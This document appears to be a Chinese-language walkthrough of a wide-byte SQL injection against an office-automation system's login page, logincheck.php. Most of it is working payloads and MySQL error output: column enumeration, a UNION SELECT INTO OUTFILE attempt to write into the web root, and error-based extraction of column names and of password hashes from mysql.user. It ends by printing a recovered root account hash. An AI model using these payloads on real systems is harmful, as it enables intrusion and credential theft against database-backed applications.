#1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘1縗’’’ at line 1 SQL语句: SELECT * from USER where USER_ID='1縗'' or BYNAME='1縗'' 文件: D:/myoa/webroot/logincheck.php
SQL语句: SELECT * from USER where USER_ID='admin縗'' or BYNAME='admin縗''
但是系统多加了一个引号’导致语句出错,我们使用#(%23)注释掉后面的语句。
PASSWORD=123456&UNAME=admin%bf'%23
SQL语句: SELECT * from USER where USER_ID='admin縗'#' or BYNAME='admin縗'#'
TESTING03 处理插入语句报错
select登陆查询语句成功执行,未报错,但是登陆日志插入语句报语法错误。
#1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘’ at line 1 SQL语句: insert into SYS_LOG (USER_ID,TIME,IP,TYPE,REMARK) values ('admin縗'#','2015-09-04 13:41:11','27.211.123.74','10','USERNAME=admin縗'#') 文件: D:/myoa/webroot/logincheck.php
#1136: Column count doesn’t match value count at row 1 SQL语句: insert into SYS_LOG (USER_ID,TIME,IP,TYPE,REMARK) values ('admin縗',2,3,4)#','2015-09-04 13:50:55','27.211.123.74','10','USERNAME=admin縗',2,3,4)#') 文件: D:/myoa/webroot/logincheck.php
判断列数 PASSWORD=123456&UNAME=admin%bf' order by 1%23
使用列最大值判断是否出错 PASSWORD=123456&UNAME=admin%bf' order by 100%23
#1054: Unknown column ‘100’ in ‘order clause’ SQL语句: SELECT * from USER where USER_ID='admin縗' order by 100#' or BYNAME='admin縗' order by 100#' 文件: D:/myoa/webroot/logincheck.php
不报错字段77,卧槽77啊 PASSWORD=123456&UNAME=admin%bf' order by 77%23 PASSWORD=123456&UNAME=admin%bf' and 1=2 union all select 123456,admin縗%23 PASSWORD=123456&UNAME=admin%bf' and 1=2 union all select 1,2,3,4,5,6,7,8,9,10,11,...,74,75,76,77 into outfile "D:/myoa/webroot/r1.txt"%23 返回空白(可能没有写入权限或者目录不可写)
admin?' AND (SELECT5821FROM(SELECTCOUNT(*),CONCAT(0x7171717071,(SELECTIFNULL(CAST(COUNT(*) ASCHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x70617373AND table_schema=0x545241494e),0x717a767071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUPBY x)a)#
FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUPBY x) as a/*这句话的意思是说每个派生出来的表(a)都必须有一个自己的别名*/)#
/*
MySQL 的CAST()和CONVERT()函数可用来获取一个类型的值,并产生另一个类型的值。两者具体的语法如下:
CAST(value as type);
CONVERT(value, type);
就是CAST(xxx AS 类型), CONVERT(xxx,类型)。
*/
爆列名
1
2
3
4
5
6
7
8
admin?' AND (SELECT4909FROM(SELECTCOUNT(*),
CONCAT(0x7171717071,
(SELECTMID((IFNULL(CAST(column_name ASCHAR),0x20)),1,50) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x70617373AND table_schema=0x545241494eLIMIT0,1),/*column_name列名,返回不止一个,用limit限制*/
0x717a767071,FLOOR(RAND(0)*2))x
FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUPBY x)a)#
admin?' AND (SELECT7241FROM(SELECTCOUNT(*),CONCAT(0x7171717071,(SELECTMID((IFNULL(CAST(passwordASCHAR),0x20)),1,50) FROM mysql.user LIMIT0,1),0x717a767071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUPBY x)a)#
current user: ‘root@127.0.0.1’ *91AF99F23C3D4ED85140D100433725DFA52BECEE
